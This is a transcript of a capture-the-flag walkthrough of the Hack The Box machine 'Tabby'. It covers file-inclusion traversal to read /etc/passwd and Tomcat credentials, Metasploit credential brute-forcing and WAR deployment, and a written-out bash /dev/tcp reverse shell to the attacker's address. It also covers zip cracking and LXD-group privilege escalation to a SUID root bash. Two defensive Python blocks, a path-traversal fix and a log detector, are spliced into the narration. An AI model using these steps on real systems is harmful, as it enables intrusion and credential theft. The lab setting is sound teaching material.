Hello everyone, my name is John Hammond. Welcome back to another YouTube video, and in this video we're gonna be taking a look at Tabby, a newly retired machine from Hack The Box. So I've got it opened up on my screen here, and Tabby is an easy machine, although you might consider it a little bit more of a medium; seemingly that's how the difficulty rating was going. I've got the IP address set here and I am connected to their VPN, so we can go ahead and get started.

I'll hop over to my terminal and I'll make a directory for YouTube/Tabby, and I'll jump in there and create a little README file that I can use to work with and take notes. I'll just have a little markdown thing here; I'll say my name and the name of the box, and today is Saturday, November 7th, 2020. Cool, cool, cool.

All right, now that we've got that done, let's make an nmap directory and then we'll go ahead and kick off an nmap scan. I will use -sC for default scripts, -sV to enumerate versions, and -oN to output in nmap format. Now that I've created an nmap directory I can just call it initial, and I will slap in the IP address, which is 10.10.10.194.

While that's going we can start another terminal down below and we could probably do some manual enumeration. Maybe if this thing has a web server, we could go check it out through a web browser. So I will open that up within Firefox, and I am met with this website, apparently Mega Hosting, and it says dedicated server starting from 99 USD, 24/7 knowledgeable support, full root access. Oh, okay. One IP included with each server, your choice of any OS, blah blah blah, call us at this totally fake number and email us at sales at megahosting.htb. Oh, okay, so we do have a domain there.
Let's go ahead and take that and, if we haven't, let's go ahead and add it into our /etc/hosts file. That way we can get around whatever potential virtual host routing might be in there. So I already have this added in, but it just takes that syntax of, okay, the IP address 10.10.10.194, the specific IP of what you want it to redirect to, and then we'll paste in megahosting.htb, as that is the domain that we kind of want here. I'll save that; you do need root privileges to be able to modify that, so I prefixed that command with sudo.

And I think our nmap results came back, so let's see what we've got to work with. Looks like we have our scan with port 22 open, so SSH; port 80 open for HTTP, the website which we've already seen and have been accessing; and port 8080 is also open with Tomcat. Okay, cool. I guess that makes sense; we did see kind of the little cat icon for the Hack The Box logo for Tabby, this machine here. With that we could probably start to enumerate, or just actually kick off a second nmap scan with all ports. So I'll use that -p- argument there and I'll just save that as allports on that guy, and we'll continue to bump around this website.

Now that we've added this megahosting.htb, that's in our hosts file, so now I should just be able to access megahosting.htb and... oh, I did mean to go to that, please. I don't need any of those things. Take me to that. Thank you, appreciate that, web browser. Okay, so now if I were to check out any of these links here, I'm looking down the bottom left of my screen to see where they go, and if I were to click on any of these they seem to just bring me back to this home page. They don't actually exist. Oh, infrastructure, okay, a little anchor tag that brings us down. All of these are also going nowhere, looking at the bottom left of my screen. They all go to the exact same page, which is this home page. Same thing with the footer. Nothing extremely interesting, just bringing us back.
I do see this note here though: we've recently upgraded several services, our servers are now more secure than ever, read our statement on recovering from the data breach. Oh, and that actually has a link to it, and that goes to news.php, the same thing that this news.php goes to over in the navigation here in the address bar. That looks like it's bringing us to a URL with news.php and the question mark to indicate a little HTTP GET variable; looks like it's file here, and that's set equal to this value, statement. That's kind of peculiar to me. I know it says, hey, we apologize to all our customers for the previous data breach, we changed the site to remove this tool and invested heavily in more secure service. Cool, whatever.

If I were to view the source, there's nothing extremely interesting here. I'm scrolling through to see any green-indicated HTML comments, but there's nothing spooky or squirrely in that. I am curious about this URL though, because if it's saying file equals, and this PHP page is the page that loads it, maybe it's trying to access an actual file on the file system and it's doing some local file inclusion, and maybe we could take advantage of that, maybe we could kind of abuse that vulnerability. I don't know if that is including a .php file extension suffix though. So in older versions of PHP you could use a null byte, or a %00 in the web browser, and that would just end the string. So if this back-end web server is using an appended .php file extension, and if we're on old-school PHP like 5 or something, that would get in the way and it wouldn't append it. So if I were to try and add that .php, that doesn't seem to do anything. Is there like a .html or .txt portion of that? I'm not getting anything, so the page isn't returning. Is that in the topmost folder? Is that in the root directory of the web server? Can I just go to statement.txt?
No. statement on its own, nothing. How about statement.php? Still nothing, okay.

Before I forget, we probably actually could go back to our terminal and run some simple scans, like nikto 10.10.10... oh, and let's use the virtual host routing, because that might give us a little bit more stuff. Now I have two HTTP schemas. So I'm just grabbing the URL for this web page, specifying -h as a header, or the host argument, for nikto, and I'll use that as kind of a scanner and I will tee that into nikto.log so I get those results there. I'll do the exact same thing with gobuster, just so I can start to enumerate maybe anything that I'm not seeing on the website. So I'll use gobuster dir, -u http://megahosting.htb, -w to specify a wordlist, and I'll use in my /opt directory this directory-list lowercase medium, and I'll tee that to a gobuster.log.

There we go. Oh, it found files. That's kind of interesting. What is in files, /files? I can't see that. Is the news.php?file=statement thing reaching to a file within that files folder? Is there a files? We can't do any directory indexing or directory listing, but is there a files/statement.php? files/statement.html or .txt? Okay, what about just no file extension?
Oh, that got a result back. Okay, and that's just the bare-bones HTML for that page. Okay, so it's definitely loading this file.

If I go back to that news.php and there's no file extension, maybe we could use a PHP filter. So if you find a local file inclusion vulnerability and it is appending, or it isn't appending, a .php file extension suffix, you could use this PHP filter to potentially get the source code, because the web server is gonna process that PHP on the back end and you never get to see that as the end user, as the client interacting with the web page. But if you could get PHP to convert all that data into something that isn't going to be processed as part of the PHP language, like a base64 encoding, you might be able to retrieve that source code. So I always forget this syntax, so I have to Google it every time. If you see an HTTP GET variable being used to potentially read in a file, then you could just get that. Let's supply php://filter/convert.base64-encode/resource=statement. I guess it's worth a try. View source: nothing is there. Okay, what about, like, I know I'm in the files folder relative to the current page, right? So if I did news.php, nothing. What if I don't filter, I just specify file=news.php? Is there anything in there? Oh, oh, I just viewed the source there; I hit Ctrl+U on my keyboard. Okay, and it looks like it's actually reading the PHP code too. Oh, so this is the source for the news.php file, and it's not running include within PHP; it's actually opening up the file and reading every single line to display it out on the screen. Okay, so this is like a sort of file_get_contents or fgets thing where it's literally reading the file, not including the PHP code as if it would execute the PHP code. It's just going to read the contents of the file.
Okay, but my little ../ worked, so I know I could climb the file system. Can I go like ../../../../ etc., etc., etc. to climb up the file system tree, and can I get to /etc/passwd? Oh, I can. Okay. Cool. Okay, so we've got some users there. It looks like I see ash as a potential user. These are all things we should probably be taking note of in our README. So: nmap results found 80 and 8080, Apache Tomcat; 80 has LFI vuln; slap in that URL, and we'll just make a little syntax there for it. Potential username... well, I mean, I guess it's not really potential; we know, because we've just read /etc/passwd, that we do have an ash user. Okay.

So because we have local file inclusion, what more could we do with this? We know we have that Apache server. Did nikto find anything interesting? No, not really whatsoever. Whatever. But we do know we have the Apache Tomcat server, right? We saw port 80 open with our nmap scan. So let's hop over to that and know that we have this LFI kind of in our back pocket. So if I go to megahosting.htb on port 8080... oh, I see, it works. If you're seeing this page via web browser, it means you've set up Tomcat successfully, congrats. Okay, so this is just a straight-up default; yeah, this is the default Tomcat home page. It can be found in the local system at that location. Neat. Can I read that with my local file inclusion? If I go up, up, up, up, just adding my ../ repeatedly, can this thing read it? Yeah, it can.
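The flaw just described is that news.php joins the file parameter straight onto its files directory and reads whatever path results, so a chain of ../ walks out to /etc/passwd. The following Python is an added example, not code from the video or the box: it reproduces that read pattern in a throwaway sandbox directory (constructed with tempfile, so it runs offline) next to a hardened version that allowlists the name, resolves the real path and refuses anything that leaves the files directory. The function and directory names are my own choices.

```python
import os
import re
import tempfile
from pathlib import Path

# Constructed sandbox: a "files" directory like the one news.php reads from,
# plus a sibling file standing in for something outside the web root.
ROOT = Path(tempfile.mkdtemp(prefix="megahosting_"))
FILES_DIR = ROOT / "www" / "files"
FILES_DIR.mkdir(parents=True)
(FILES_DIR / "statement").write_text("<p>constructed statement page</p>\n")
(ROOT / "secret.conf").write_text("constructed secret outside the web root\n")

# Only bare names are acceptable: no dots, slashes or scheme prefixes.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+$")


def read_news_unsafe(name: str) -> str:
    """Mirrors the flaw on the page: the parameter is joined straight onto the
    files directory, so '../' sequences walk out of it."""
    with open(os.path.join(FILES_DIR, name)) as fh:
        return fh.read()


def read_news_safe(name: str) -> str:
    """Hardened version: allowlist the name, resolve the real path, and refuse
    anything that does not stay inside FILES_DIR."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("rejected: name contains characters outside the allowlist")
    base = FILES_DIR.resolve()
    target = (base / name).resolve()
    # resolve() follows symlinks, so a link planted inside files/ that points
    # outside the directory is caught here as well.
    if base not in target.parents:
        raise ValueError("rejected: path escapes the files directory")
    if not target.is_file():
        raise FileNotFoundError(name)
    return target.read_text()


def demo() -> dict:
    """Show what each implementation does with a benign name and a traversal."""
    traversal = "../../secret.conf"
    result = {"safe_ok": read_news_safe("statement").startswith("<p>")}
    try:
        read_news_unsafe(traversal)
        result["unsafe_leaks"] = True
    except OSError:
        result["unsafe_leaks"] = False
    try:
        read_news_safe(traversal)
        result["safe_blocks"] = False
    except ValueError:
        result["safe_blocks"] = True
    return result


if __name__ == "__main__":
    print(demo())
```

The allowlist check alone would stop this case; the realpath containment check is there because it also covers symlinks and encoded variants that a pattern might miss, and the two together are cheap.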
Okay, cool. So this local file inclusion might be super duper helpful if we wanted to get anything that the Tomcat thing might have. Tomcat veterans may be pleased to learn the system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9, ah, and CATALINA_BASE. Those are environment variables, those are the config locations for Tomcat and stuff, and that might be super duper helpful for us because we can access the Tomcat 9, and 9 looks like the version that we're working with, so that's important to know. Tomcat 9 docs we can reach. Okay, and that's serving it from this server; it's not third-party external on the open internet, this is on the box. That's good to know. Tomcat 9 examples we can also reach. Tomcat 9 admin, that's what we want. We want to be able to mess with some stuff. You can access the manager web app and that needs a username and password. Okay, and, oh yeah, thanks. So I just hit Escape and: you are not authorized to view this page. If you have not changed any configuration files, please examine the conf/tomcat-users.xml in your installation. What is that, tomcat-users.xml? Is that where, oh, that file must contain the credentials to let you use this web app. Okay, so that's where our credentials are going to be; it's in the tomcat-users.xml file. Is that in conf? Note that for Tomcat 7 and onwards the roles required to use the manager services were changed from the single manager role to the following four roles. Okay. manager-gui allows access to the HTML GUI, good; manager-script allows access to the text interface and the status page, etc. Okay, okay, that's fine. That was one of those pages, that was the manager web app, but can I actually reach the host manager web app, this other link here? Let me click on that, and that also is password protected. Okay, I'm gonna hit Escape on that. Not authorized to view this page. Same, need to check out tomcat-users, and we need the admin-gui role. Oh, are these like default credentials we could use?
tomcat / s3cret, with the little 3. It's worth a try. admin-gui allows access to the HTML GUI, which is this page, and admin-script allows access to the text interface. Okay. Let's try and go back to that page. Oh, did I lose my opportunity? Oh, okay, cool. I just hit Ctrl+F5 to get prompted again and hard-refresh that. So tomcat with the password s3cret, with a 3 for the first e. That is not the right password.

We could try some Tomcat default username and password pairs, or I think msfconsole can do that. I think Metasploit has that thing, and there is a wordlist, there is a dictionary list of all the potential default Tomcat usernames and passwords. So if I search for tomcat, let's search for tomcat. What do we have here? There's a lot of stuff, but I want to check out some of the auxiliary scanners. Check if you have default access to the Tomcat administration tool with Tomcat administration; UTF-8 traversal; Trend Micro; auxiliary/scanner/http/tomcat_enum; auxiliary/scanner/http/tomcat_mgr_login. Hmm, I think that's the one. Let's try that. Let's go ahead and use auxiliary/scanner/http/tomcat_mgr_login. Let's show options to see what we're working with here. And I am gonna be using Metasploit, by the way; you can grab your pitchforks and you can kind of whine and say, hey, script kiddie, whatever. I don't really care. If there's a tool, why have tools if you're not going to use them?

So, okay, TARGETURI goes to /manager/html, and we did see that that URL for the manager web app did bring us to /manager/html, so that's the right location for TARGETURI. USERNAME is not mandatory, because it'll fill all that in; same thing with USERPASS and USER_FILE, which actually pulls from, okay, default users and default passwords, and that is bundled in the Metasploit framework. Okay, we just need to give it an actual RHOSTS. So RPORT is still 8080, but we need to set our RHOSTS variable.
So let's set RHOSTS to 10.10.10.190 and crank the thing. Login failed, login failed, login failed, login failed. Okay, so that's not working for us. Okay, well, that's a bummer.

Oh well, wait a second. We have that local file inclusion vulnerability. We could potentially read or find where the Tomcat users credential file is, right? The home page here said CATALINA_HOME is in /usr/share/tomcat9. So where is tomcat-users.xml located? If I just Google that: tomcat-users.xml is located by default in CATALINA_HOME/conf/tomcat-users.xml. Okay, so we can put those pieces together, right? If we've got the value of CATALINA_HOME and we know where this thing might be, let's smartly figure that out. Let's climb up, up, up, up, up, up, up, up, and let's try that /usr/share/tomcat9, and this said conf, right? Crap, where did that go? That was in the manager web app: conf/tomcat-users.xml, and that's the credentials file. So slap that in. There's nothing there. Oh, okay. There's just right up nothing there. Crap, that's probably not the right location.

I guess we could look in a Docker instance, or a Docker image for Tomcat, like a Tomcat Docker Hub. Okay, so yeah, there are official images for a Tomcat installation. Maybe if we just go to the different tags and try to find one that's version 9, maybe. Okay, there's like a 9, yeah, whatever, a 9.0, a 9, I don't care. I guess I'll just grab it. Can I docker pull this down? Okay. docker run on that thing, and I guess I'll make it an interactive terminal, so -it, run /bin/bash. Okay, and then I guess we'll just try to find a file with a name of tomcat-users.xml: /usr/local/tomcat/conf/tomcat-users.xml. It's worth a try. Maybe, well, I don't know, because ours said it was in, like, if we go back to the home page there, right, if I go to this, it says it's /usr/share/tomcat9, and it said it's conf/tomcat-users after CATALINA_BASE or CATALINA_HOME. So will that one work?
I feel like that's totally the wrong location. No, that's totally the wrong location.

We could take the old one and kind of fuzz it. Like, if we know this is CATALINA_HOME, right, /usr/share/tomcat9, and then we know we want a tomcat-users that is in some directory in there, we could fuzz it. Maybe I could use wfuzz. If I exit out of this bash shell, can I use wfuzz? wfuzz -c to use colors, and then I need a wordlist, right? So I'll use the /opt directory-list medium, and I will specify the URL. I guess I don't need that view-source in there anymore, but I want to fuzz this directory, FUZZ, so it could try a bunch of stuff and see if it ever gets a response. If I whack that, okay, it's trying a bunch of stuff, but they're all zero length, or zero words, or zero characters, because those are all probably the wrong location; it's not returning a file. Let's use that same command and grep for the things that aren't a zero-length response, so grep -v to invert what we see, and we'll see if we get a bunch of stuff here. Oh, okay, okay. Oh, stop, stop. There was a 200 response with 47 length and some characters in there, in etc. Okay, is that a location for us, etc? Yes, awesome.

Okay, so now we have the username and password we could use to access the admin portion of Tomcat, right? So we have the admin-gui role and the manager-script role. So let's grab these credentials. I guess we'll save them in our README file, and we'll keep track of this URL: found Tomcat credentials via our LFI technique, and now we have tomcat as a user and the super secure password in leetspeak. With that, so if I go back now and try to access that manager web app, I'll Ctrl+F5 and I will use tomcat with that super secure password that I copied and pasted. Access denied: you are not authorized to view this page. By default the manager is only accessible from a browser running on the same machine as Tomcat. Okay, that doesn't help. Oh, the roles here though.
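Everything in this stretch leaves footprints in the web server's access log: the traversal and php://filter probes against news.php, the Metasploit default-credential run against /manager/html (a burst of 401s from one address), and then a successful login to a manager app from an address that had just been refused. The following Python is an added example, not code from the video or from any tool it uses: it parses constructed Apache combined-format log lines (the sample lines and addresses are made up for this example) and flags each of those three patterns. The marker list, threshold and function names are my own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed access-log lines in Apache combined format for this example;
# none of them are real captured traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Nov/2020:14:02:11 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Nov/2020:14:02:40 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2003 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Nov/2020:14:03:05 +0000] "GET /news.php?file=php://filter/convert.base64-encode/resource=statement HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Nov/2020:14:03:30 +0000] "GET /news.php?file=..%2F..%2Fusr%2Fshare%2Ftomcat9%2Fetc%2Ftomcat-users.xml HTTP/1.1" 200 1121 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Nov/2020:14:10:01 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Nov/2020:14:10:02 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Nov/2020:14:10:02 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Nov/2020:14:10:03 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Nov/2020:14:10:03 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Nov/2020:14:10:04 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/5.0"
192.0.2.77 - - [07/Nov/2020:14:15:00 +0000] "GET /host-manager/html HTTP/1.1" 401 2473 "-" "Mozilla/5.0"
192.0.2.77 - - [07/Nov/2020:14:15:20 +0000] "GET /host-manager/html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Substrings that indicate file-read probing of a file= style parameter.
LFI_MARKERS = ("../", "..\\", "php://", "/etc/passwd", "tomcat-users.xml")
ADMIN_PATHS = ("/manager/", "/host-manager/")
BRUTE_THRESHOLD = 5  # 401s from one address against the manager apps


def parse_line(line):
    """Split one combined-format line into ip, timestamp, path and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode once so %2F-encoded traversal is matched like the plain form.
    rec["decoded"] = unquote(rec["path"])
    return rec


def find_lfi_probes(log_text):
    """Return (ip, decoded path) for requests carrying traversal/filter markers."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and any(m in rec["decoded"].lower() for m in LFI_MARKERS):
            hits.append((rec["ip"], rec["decoded"]))
    return hits


def find_manager_bruteforce(log_text, threshold=BRUTE_THRESHOLD):
    """Return {ip: count} for addresses with >= threshold 401s on the manager apps."""
    failures = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 401 and rec["decoded"].startswith(ADMIN_PATHS):
            failures[rec["ip"]] += 1
    return {ip: n for ip, n in failures.items() if n >= threshold}


def find_manager_success_after_failure(log_text):
    """Addresses that got a 200 from a manager app after being refused there."""
    seen_fail, flagged = set(), set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["decoded"].startswith(ADMIN_PATHS):
            continue
        if rec["status"] == 401:
            seen_fail.add(rec["ip"])
        elif rec["status"] == 200 and rec["ip"] in seen_fail:
            flagged.add(rec["ip"])
    return sorted(flagged)


if __name__ == "__main__":
    for ip, path in find_lfi_probes(SAMPLE_LOG):
        print("LFI probe", ip, path)
    print("manager brute-force", find_manager_bruteforce(SAMPLE_LOG))
    print("login after failures", find_manager_success_after_failure(SAMPLE_LOG))
```

Note the decode step: the fourth sample line carries the traversal URL-encoded, and a detection that only looks at the raw request line would miss it. The same three checks work on Tomcat's own AccessLogValve output, since it uses the same combined pattern by default.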
We have manager-gui, manager-script; those are the ones that have actions. We don't have manager-gui. We only have manager-script. What about that other page, the host manager web app? Tomcat credentials... ooh, ooh, ooh, that worked. But this looks like it's just the virtual host manager, so I can list hosts or add them. Okay, I have localhost. That's lame-o.

We saw some stuff in Metasploit, right? If I go back to my Metasploit, I could once again search for tomcat and get to manager deploy or manager upload. Which are the ones... we have manager-script as a role, so what are the things that I can do with Tomcat manager-script? Exploit: exploiting Apache Tomcat manager-script role. Excellent. Okay. Exploiting a Tomcat manager-script role, you hate to see it, hate to see it. Apache Tomcat: they got the user, they found the role, okay, and they upload a WAR file. How did they do that? Oh, they put it in /manager/text/deploy. Deploy, it looks like, is what it needs. So Metasploit could probably do that, right, with the deploy one. If I use manager deploy, let's see what options we've got to work with. I will go ahead and set my LHOST to be my little one there, my interface for the Hack The Box OpenVPN connection, and I'll set an explicit LPORT because I think 4444 is in the way of some stuff. And I need to know the HTTP password and username, which we do know, so I'm gonna set this as global in case we need to jump to a different one. But let's set the password first, because I happen to type that first. I will go ahead and paste that in, and then we'll do the same thing setting the username, which we know is just tomcat. Okay. And the RPORT is wrong; that needs to be 8080, and we still need to set the RHOSTS. So let's set the RHOSTS 10.10.10.194 and RPORT should be 8080. Run. I just set my LPORT to something else; set LPORT to 5555. Do it. Error requesting manager server info. Is that not a thing? Exploit aborted due to failure: no-target, unable to automatically select a target. Well, you
don't have to select a target automatically. Can I see the targets that you can do? Yeah, you don't need to use an automatic one. I know this is gonna end up running either on Java or on Linux, because it's a Linux server running Java; we saw that with our nmap scan. So let's set target to, like, 1 and see if that goes. Upload failed on manager deploy path. That's not right. It needs to be manager... sorry, I realized that was hard to see. manager deploy needs a location, but that's that /manager/text. So can I get to that? If I go to the host manager, if I go to /manager/text, yeah, that's a thing, and there is a deploy page. Yeah, yeah, yeah. Okay, so set... what is that, what is that option? show options. PATH needs to be /manager/text. set PATH /manager/text. Now go. Oh, okay. What? What? Set VERBOSE to true. Let's run it again. Why no session? Oh, that's my... that doesn't look like the right... such a stinking LHOST. Why did none of my local settings take place? That doesn't look like the right IP address. What is my current IP? ip a; tons here. What's my current local IP address, this thing? Let's go to that, please. Set LHOST to my IP address, now run. Okay. I don't know why that was doing that; whatever. We've got a Meterpreter session, right? We're on the box. We've got code execution. So we're currently the tomcat user.

Let's bebop around. I guess, where am I right now? pwd, okay, /var/lib/tomcat9. Can I get into that ash directory? ash, nope. Oh, I don't... whoa, where am I now? I don't know. Can I just get to /home, please? Okay, I do not have permission to go into the ash home directory, seemingly. We could get a better shell if we didn't want to use Meterpreter; I could just pop over to pwncat or something. Maybe we'll do that. Let's do that. So I'm going to hop over to my git directory for pwncat. I'm gonna go ahead and git pull. Great, we've got all the latest changes. Let's go ahead and activate the virtual environment, so source bin/activate. Now that that's good.
Let's go ahead and run pwncat listening on 8888. Cool. Okay. Now that that's a thing, we can try and get into a shell here, and let's just run a bash -c to make sure we're in bash: bash -i, redirect it to &/dev/tcp/... what was my IP address again? I always forget this. 14.8, 10.10.14.8, port 8888, and then it's 0>&1. Go. Did it work? Did it work? Did I have my wrong IP address? It's on 10.10.14.8. Oh, I had a stinking... I literally said it and then got it wrong. bash -c 'bash -i >& /dev/tcp/10.10.14.8/8888 0>&1'. I wrote 18 when I meant to just use 8. There we go. Please, for the love of God. This video is going really, really well, I don't know why. /dev/tcp/10.10.14.8/8888 0>&1. What's going on? Did this thing break? Why did I break it? Because of the first command? Yeah. Terminate that channel, get me back into a regular shell, slap that in, and that syntax would have worked just fine; I just broke it earlier like an idiot. That's all.

All right, now we've got a regular normal shell in here, and we could upload and download things with the benefit of pwncat. We can move into ash or see the proper error messages. Let's go explore the web server in case there was some stuff like connections to a database that we had missed or whatever. That files directory, I know we didn't have any visibility in, we didn't have any coverage of that, so let's hop into /var/www/html, the default location for the web server, and in files there is some interesting stuff. Okay, there's an archive directory with nothing in it. How about revoked certs, with nothing in it? But I do see that backup. Let's go ahead and download that. Let's download that 16 thing, pull it down. Okay, and let's move back on my original host. Let's move that backup, since it landed in the git pwncat directory, because that's the current directory that I was in, into here, and let's try and unzip that backup zip archive.
Oh, it needs a password. Okay. We could use fcrackzip. I always remember the arguments to fcrackzip with -u -D -p, capital D; you can remember that however you'd like. But then it needs to know the password, right? So I'm gonna use rockyou.txt and I'm gonna try and use the zip file that we downloaded. That took me a while to process. There we go: password found is admin@it. Okay. Now can I unzip that archive? Yep, slapping in that password, and it looks like we've got an old-school backup of the PHP and the web server. So let's move into that var directory, www, html, and index.html might showcase some interesting stuff. I don't see any interesting... oh, sorry, index.php is what I meant to say, with that file extension, but I don't see any interesting PHP files. So that's a pain. There's no PHP syntax in here. Oh, there's a different email now: X speed studio, XP, XP studio at gmail.com. Nothing else interesting in there. There's literally no PHP in this. This doesn't help me. What about the news.php? That's the exact same syntax we saw earlier; that doesn't help. Anything in files? No. What is that README? Are there any credentials in there? Oh, this is just a Bootstrap theme, so there's nothing interesting in that either. Okay, that's seemingly useless.

But I guess we have a password, and maybe, right, we had that admin@it password. It is a password and we've got to keep that in mind. So I wonder if that might be a password for that ash user. It's worth a try. We could try and just SSH in: ssh ash@10.10.10.194. Oh, and that needs a public key. Okay. I guess we could just try and su to it back in our reverse shell: su ash with admin@it. Oh, that worked. Okay, cool, now we're the ash user. Great. Well, let's try and do some regular enumeration that we probably should have done earlier. Let's go ahead and run enumerate from pwncat, so it's gonna use kind of its equivalent of LinPEAS.
Let's see if we've got anything interesting in here. I will scroll, scroll, scroll, scroll, scroll all the way up to the top. Blah blah blah, enumerate, gather mountpoints, SetUID binaries. Oh, we have snap. What is this, is this like a new Ubuntu box or something? Probably. ASLR is on; that's annoying. Not that I... I don't think we probably have to care about it. Some Metasploit payloads in there, cool. It said rhosts. Oh, we have screen. Yeah, okay, so a bunch of 20.04 and... what are we running here? A lot of services, nothing incredible. Potential password, and the Tomcat stuff, cool; pwncat was able to find the password that we found earlier. A lot of false positives for that. File capabilities: none of those seem out of place; ping and mtr-packet are kind of normal. Kernel version. System hostname is tabby. Cron entries look normal. Sudo version. Okay, so pwncat probably did its own enumeration, but it is also worthwhile to run LinPEAS on its own, because I think it's good to kind of double up on the tools that you're using; maybe one tool might find something that another didn't. So we can get LinPEAS on the box, and let's go ahead and run it to see if it finds any interesting enumeration stuff. And ooh, okay, it actually immediately finds something that I'm kind of interested in. You know the key that the beautiful LinPEAS will use... oh wow, what did I do? That will give you a little kind of color-coded legend as to the things that are very, very likely a privilege escalation vector, and I can see immediately that just the output of the id command here, this ash user that we're running as, is in the lxd group. So I've showcased an LXD or LXC privesc previously in a different video, the TryHackMe gaming server room, I think I showcased it, but looks like we could use that technique to go ahead and escalate our privileges to get root.
We are of course, hey, running as this ash user, so if you wanted to, yeah, you can go into his home directory, go ahead and grab user.txt. I'll go ahead and show you that that's a thing: 33 characters, 32 being the hash and then the newline character at the very end. You could submit that and get your points and do whatever.

But let's try and escalate our privileges with LXC, because we can run that command there, right? Okay, so we can see if there are any images or containers we could go ahead and run. So let's do lxc list, and looks like there's nothing in here currently, so we need to go ahead and create one. So let me do a little Google for LXC privesc, and it looks like there's some stuff we could use from HackTricks; that's great. There's an Exploit-DB article here. Oh, it looks like this is the script I think I had used in that gaming server video. This is super duper handy, because you can just give it an Alpine built image instance and then it'll go ahead and run the LXC commands to import that file, create it as a container, add the root location in there, or mount this target file system, so you could go ahead and actually manipulate this file system and be root, right, and go ahead and execute it and get a shell inside that container, and then it'll go ahead and remove it and clean it up for you. So I will use this. This is super handy, this is super great. So I'll go ahead and copy this, and let's just move into /dev/shm again, and let's go ahead and add this into, like, lxc, I guess, like privesc.sh, and I will slap all this stuff in. Great. Save that. So now that I have that LXC privesc script, let's mark that as executable.
And then if I were to run it, it will need a file name of the built Alpine image that we can create a container from, because LXC will allow us to create a container that we could use, and because we could use that we could actually mount this file system and act as root on that. So that's pretty great, and I cover that a little bit more in the TryHackMe gaming server room, so if you're interested, please go take a look at that video. But for now, I will showcase how we could go ahead and run that. Looks like we are going to use this build-alpine tool, and they recommend it here in the little script that they've offered. So I will go ahead and get back to my host machine, and I will move up to get into that YouTube/Tabby directory, and I'll run that command to download the build-alpine script. I'll take a look at it. All it's going to really do is grab the Alpine Linux install and static information and the files and the repositories and the package manager, everything that it really needs, and then it bundles it all together into a file system and builds an image that we could use, and installs it and works with it. So I'm trusting of it. It tells me that you need to run this as root, and it is a good idea to, okay, go ahead and actually read through the code that you're going to end up running before you sudo ./ and actually run a script, but this templating does require root access. So let's run the thing and build our instance. So I'll sudo... first I mark this as executable, I'll build that Alpine, and sudo ./build-alpine. Needs my password here. It will download everything, it'll go ahead and fail, apparently. Okay, um, does that need a specific mirror? Selecting mirror... where are you finding that? Where are you choosing that mirror? Maybe that mirror is not a good mirror. Alpine build-alpine mirrors, where did you put all this? Oh, in rootfs? Yeah, yeah, yeah, okay, so mirrors are in rootfs/usr/share/alpine-mirrors/MIRRORS.txt. Can I cd into that?
Yeah, it's a file, I know. So can I cat all that? No. Oh, MIRRORS.txt has all this stuff, okay. Which one did it choose in the script? It chose ARR net. Why'd you choose that one, ARR net? Did you just kind of choose that at random? Let's use just the very top one, please, and yeah, let's... it's owned by root, so let's run it as root, and let's try to do that again, please. Now it's using that deal. Okay, good. It's installing the stuff that it needs, so maybe that will behave for me, fingers crossed. Installing all this stuff so we can build that Alpine image and we can get that onto our victim machine. We'll just go ahead and upload it, then use that script on the target and then go ahead and mount all that.

So now I have an alpine-v3.12 thing that we can go ahead and upload, so I will do that now. I'll get back to my target and I will go ahead and upload from home/john/ctf/hackthebox/youtube/tabby, and it's this thing. So I can upload that, and it's gonna take a little bit of time because it is three megabytes, but it should be quick thanks to the pwncat magic. Great, now that that's done, okay, we have that there and I can run lxc-privesc, and that needs to know the file name, so I will use -f with that Alpine image, and it should, fingers crossed, be able to import that and run it. There we go. Device giveMeRoot added to privesc, and I am currently root. Now I'm root inside this container, but it mounted the target file system at /mnt/root, right? Yeah, now I have the target file system there. So if I cat etc/passwd, relative, like without using the forward slash at the beginning, I'll get the output that has ash in there. So relative to this current location where I am right now, inside of /mnt/root, I am root on their file system. So sure, you could hop into the root directory and you could again grab the root.txt and you could be done. That's it, but you're kind of like, you know me, I like to do my classic.
Hey, let's get a real root shell on the system. So let me go ahead and chmod +s on bin/bash, again relative, inside this file system for the target, the victim file system. Now if I were inside of this container and I wanted to exit out, I could stop this container. I'll bring myself back to being ash at tabby, but I can now run bash -p, because we've modified the victim target's /bin/bash to be a SetUID binary. That's what that chmod +s will let us do. So I could invoke bash with -p to maintain those SetUID rights, and now I am the root user. I can run whoami and I am in fact root, so I can go back to cd /root, ls -la, all this stuff in here. I can grab root.txt, I could read it, I could grab that flag and be done with this box.

